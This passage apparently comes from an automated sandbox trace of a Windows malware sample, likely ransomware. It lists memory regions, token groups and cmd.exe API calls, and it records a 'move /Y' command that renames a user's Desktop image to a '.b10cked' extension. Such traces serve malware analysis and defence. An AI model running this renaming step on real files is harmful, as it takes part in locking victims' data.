[0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 33517 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 33518 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 33519 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 33520 start_va = 0x190000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 33521 start_va = 0xbd0000 end_va = 0xbd6fff entry_point = 0xbd0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 33522 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 33523 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 33524 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 33525 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 33526 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 33527 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 33528 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 33529 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 33530 start_va = 0x350000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 33531 start_va = 0x3a0000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 33532 start_va = 0x71e30000 end_va = 0x71e4cfff entry_point = 0x71e30000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 33533 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 33534 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 33535 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 33536 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 33537 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 33538 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 33539 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 33540 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 33541 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 33542 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 33543 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 33544 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 33545 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 33546 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 809 os_tid = 0x5e0 Process: id = "586" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16aa0" os_pid = "0xf50" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\1UP3L~1.BMP\" \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\1up3 l.bmp.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 33559 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 33560 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 33561 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 33562 start_va = 0xf0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 33563 start_va = 0x49e00000 end_va = 0x49e4bfff entry_point = 0x49e00000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 33564 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 33565 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 33566 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 33567 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 33568 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 33659 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 33660 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 33661 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 33662 start_va = 0xd0000 end_va = 0xdffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 33663 start_va = 0x2a0000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 33664 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 33665 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 33666 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 33667 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 33668 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 33669 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 33670 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 33671 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 33672 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 33673 start_va = 0x3a0000 end_va = 0x467fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 33674 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 33675 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 33676 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 33677 start_va = 0xe0000 end_va = 0xe1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 33678 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 33679 start_va = 0x200000 end_va = 0x200fff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 33680 start_va = 0x470000 end_va = 0x570fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 33681 start_va = 0x580000 end_va = 0x117ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 33682 start_va = 0x1180000 end_va = 0x12e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001180000" filename = "" Thread: id = 810 os_tid = 0xe28 [0224.495] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1efccc | out: lpSystemTimeAsFileTime=0x1efccc*(dwLowDateTime=0xb9760060, dwHighDateTime=0x1d440a9)) [0224.495] GetCurrentProcessId () returned 0xf50 [0224.495] GetCurrentThreadId () returned 0xe28 [0224.495] GetTickCount () returned 0x3e0ad [0224.495] QueryPerformanceCounter (in: lpPerformanceCount=0x1efcc4 | out: lpPerformanceCount=0x1efcc4*=28128412940) returned 1 [0224.496] GetModuleHandleA (lpModuleName=0x0) returned 0x49e00000 [0224.496] __set_app_type (_Type=0x1) [0224.496] __p__fmode () returned 0x76b331f4 [0224.496] __p__commode () returned 0x76b331fc [0224.496] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49e221a6) returned 0x0 [0224.496] __getmainargs (in: _Argc=0x49e24238, _Argv=0x49e24240, _Env=0x49e2423c, _DoWildCard=0, _StartInfo=0x49e24140 | out: _Argc=0x49e24238, _Argv=0x49e24240, _Env=0x49e2423c) returned 0 [0224.496] GetCurrentThreadId () returned 0xe28 [0224.496] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe28) returned 0x38 [0224.496] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0224.496] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0224.496] SetThreadUILanguage (LangId=0x0) returned 0x409 [0224.496] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0224.496] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1efc5c | out: phkResult=0x1efc5c*=0x0) returned 0x2 [0224.496] VirtualQuery (in: lpAddress=0x1efc93, lpBuffer=0x1efc2c, dwLength=0x1c | out: lpBuffer=0x1efc2c*(BaseAddress=0x1ef000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0224.496] VirtualQuery (in: lpAddress=0xf0000, lpBuffer=0x1efc2c, dwLength=0x1c | out: lpBuffer=0x1efc2c*(BaseAddress=0xf0000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0224.496] VirtualQuery (in: lpAddress=0xf1000, lpBuffer=0x1efc2c, dwLength=0x1c | out: lpBuffer=0x1efc2c*(BaseAddress=0xf1000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0224.497] VirtualQuery (in: lpAddress=0xf3000, lpBuffer=0x1efc2c, dwLength=0x1c | out: lpBuffer=0x1efc2c*(BaseAddress=0xf3000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0224.497] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x1efc2c, dwLength=0x1c | out: lpBuffer=0x1efc2c*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0224.497] GetConsoleOutputCP () returned 0x1b5 [0224.497] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e24260 | out: lpCPInfo=0x49e24260) returned 1 [0224.497] SetConsoleCtrlHandler (HandlerRoutine=0x49e1e72a, Add=1) returned 1 [0224.497] _get_osfhandle (_FileHandle=1) returned 0x7 [0224.497] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0224.497] _get_osfhandle (_FileHandle=1) returned 0x7 [0224.497] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49e241ac | out: lpMode=0x49e241ac) returned 1 [0224.497] _get_osfhandle (_FileHandle=1) returned 0x7 [0224.497] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0224.497] _get_osfhandle (_FileHandle=0) returned 0x3 [0224.497] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49e241b0 | out: lpMode=0x49e241b0) returned 1 [0224.498] _get_osfhandle (_FileHandle=0) returned 0x3 [0224.498] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0224.498] GetEnvironmentStringsW () returned 0x2b01a8* [0224.498] FreeEnvironmentStringsW (penv=0x2b01a8) returned 1 [0224.498] GetEnvironmentStringsW () returned 0x2b01a8* [0224.498] FreeEnvironmentStringsW (penv=0x2b01a8) returned 1 [0224.498] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eebcc | out: phkResult=0x1eebcc*=0x40) returned 0x0 [0224.498] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eebd4, lpData=0x1eebd8, lpcbData=0x1eebd0*=0x1000 | out: lpType=0x1eebd4*=0x0, lpData=0x1eebd8*=0xd0, lpcbData=0x1eebd0*=0x1000) returned 0x2 [0224.498] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eebd4, lpData=0x1eebd8, lpcbData=0x1eebd0*=0x1000 | out: lpType=0x1eebd4*=0x4, lpData=0x1eebd8*=0x1, lpcbData=0x1eebd0*=0x4) returned 0x0 [0224.498] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eebd4, lpData=0x1eebd8, lpcbData=0x1eebd0*=0x1000 | out: lpType=0x1eebd4*=0x0, lpData=0x1eebd8*=0x1, lpcbData=0x1eebd0*=0x1000) returned 0x2 [0224.498] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eebd4, lpData=0x1eebd8, lpcbData=0x1eebd0*=0x1000 | out: lpType=0x1eebd4*=0x4, lpData=0x1eebd8*=0x0, lpcbData=0x1eebd0*=0x4) returned 0x0 [0224.498] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eebd4, lpData=0x1eebd8, lpcbData=0x1eebd0*=0x1000 | out: lpType=0x1eebd4*=0x4, lpData=0x1eebd8*=0x40, lpcbData=0x1eebd0*=0x4) returned 0x0 [0224.498] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eebd4, lpData=0x1eebd8, lpcbData=0x1eebd0*=0x1000 | out: lpType=0x1eebd4*=0x4, lpData=0x1eebd8*=0x40, lpcbData=0x1eebd0*=0x4) returned 0x0 [0224.498] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eebd4, lpData=0x1eebd8, lpcbData=0x1eebd0*=0x1000 | out: lpType=0x1eebd4*=0x0, lpData=0x1eebd8*=0x40, lpcbData=0x1eebd0*=0x1000) returned 0x2 [0224.498] RegCloseKey (hKey=0x40) returned 0x0 [0224.498] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eebcc | out: phkResult=0x1eebcc*=0x40) returned 0x0 [0224.499] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eebd4, lpData=0x1eebd8, lpcbData=0x1eebd0*=0x1000 | out: lpType=0x1eebd4*=0x0, lpData=0x1eebd8*=0x40, lpcbData=0x1eebd0*=0x1000) returned 0x2 [0224.499] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eebd4, lpData=0x1eebd8, lpcbData=0x1eebd0*=0x1000 | out: lpType=0x1eebd4*=0x4, lpData=0x1eebd8*=0x1, lpcbData=0x1eebd0*=0x4) returned 0x0 [0224.499] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eebd4, lpData=0x1eebd8, lpcbData=0x1eebd0*=0x1000 | out: lpType=0x1eebd4*=0x0, lpData=0x1eebd8*=0x1, lpcbData=0x1eebd0*=0x1000) returned 0x2 [0224.499] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eebd4, lpData=0x1eebd8, lpcbData=0x1eebd0*=0x1000 | out: lpType=0x1eebd4*=0x4, lpData=0x1eebd8*=0x0, lpcbData=0x1eebd0*=0x4) returned 0x0 [0224.499] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eebd4, lpData=0x1eebd8, lpcbData=0x1eebd0*=0x1000 | out: lpType=0x1eebd4*=0x4, lpData=0x1eebd8*=0x9, lpcbData=0x1eebd0*=0x4) returned 0x0 [0224.499] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eebd4, lpData=0x1eebd8, lpcbData=0x1eebd0*=0x1000 | out: lpType=0x1eebd4*=0x4, lpData=0x1eebd8*=0x9, lpcbData=0x1eebd0*=0x4) returned 0x0 [0224.499] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eebd4, lpData=0x1eebd8, lpcbData=0x1eebd0*=0x1000 | out: lpType=0x1eebd4*=0x0, lpData=0x1eebd8*=0x9, lpcbData=0x1eebd0*=0x1000) returned 0x2 [0224.499] RegCloseKey (hKey=0x40) returned 0x0 [0224.499] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b8 [0224.499] srand (_Seed=0x5b8863b8) [0224.499] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\1UP3L~1.BMP\" \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\1up3 l.bmp.b10cked\"" [0224.499] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\1UP3L~1.BMP\" \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\1up3 l.bmp.b10cked\"" [0224.499] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e25260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0224.499] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2b1908, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0224.500] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0224.500] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0224.500] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0224.500] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0224.500] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0224.500] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0224.500] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0224.500] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0224.500] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0224.500] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0224.500] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0224.500] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0224.500] GetEnvironmentStringsW () returned 0x2b22f8* [0224.500] FreeEnvironmentStringsW (penv=0x2b22f8) returned 1 [0224.500] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0224.500] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0224.500] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0224.500] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0224.500] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0224.500] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0224.500] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0224.500] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0224.500] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0224.500] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0224.500] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1ef998 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0224.500] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1ef998, lpFilePart=0x1ef994 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1ef994*="Desktop") returned 0x18 [0224.500] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0224.501] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1ef714 | out: lpFindFileData=0x1ef714) returned 0x2b0038 [0224.501] FindClose (in: hFindFile=0x2b0038 | out: hFindFile=0x2b0038) returned 1 [0224.501] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1ef714 | out: lpFindFileData=0x1ef714) returned 0x2b0038 [0224.501] FindClose (in: hFindFile=0x2b0038 | out: hFindFile=0x2b0038) returned 1 [0224.501] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1ef714 | out: lpFindFileData=0x1ef714) returned 0x2b0038 [0224.501] FindClose (in: hFindFile=0x2b0038 | out: hFindFile=0x2b0038) returned 1 [0224.501] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0224.501] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0224.501] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0224.501] GetEnvironmentStringsW () returned 0x2b2b18* [0224.502] FreeEnvironmentStringsW (penv=0x2b2b18) returned 1 [0224.502] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e25260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0224.502] GetConsoleOutputCP () returned 0x1b5 [0224.502] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e24260 | out: lpCPInfo=0x49e24260) returned 1 [0224.502] GetUserDefaultLCID () returned 0x409 [0224.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49e24950, cchData=8 | out: lpLCData=":") returned 2 [0224.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1efad8, cchData=128 | out: lpLCData="0") returned 2 [0224.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1efad8, cchData=128 | out: lpLCData="0") returned 2 [0224.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1efad8, cchData=128 | out: lpLCData="1") returned 2 [0224.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49e24940, cchData=8 | out: lpLCData="/") returned 2 [0224.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49e24d80, cchData=32 | out: lpLCData="Mon") returned 4 [0224.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, 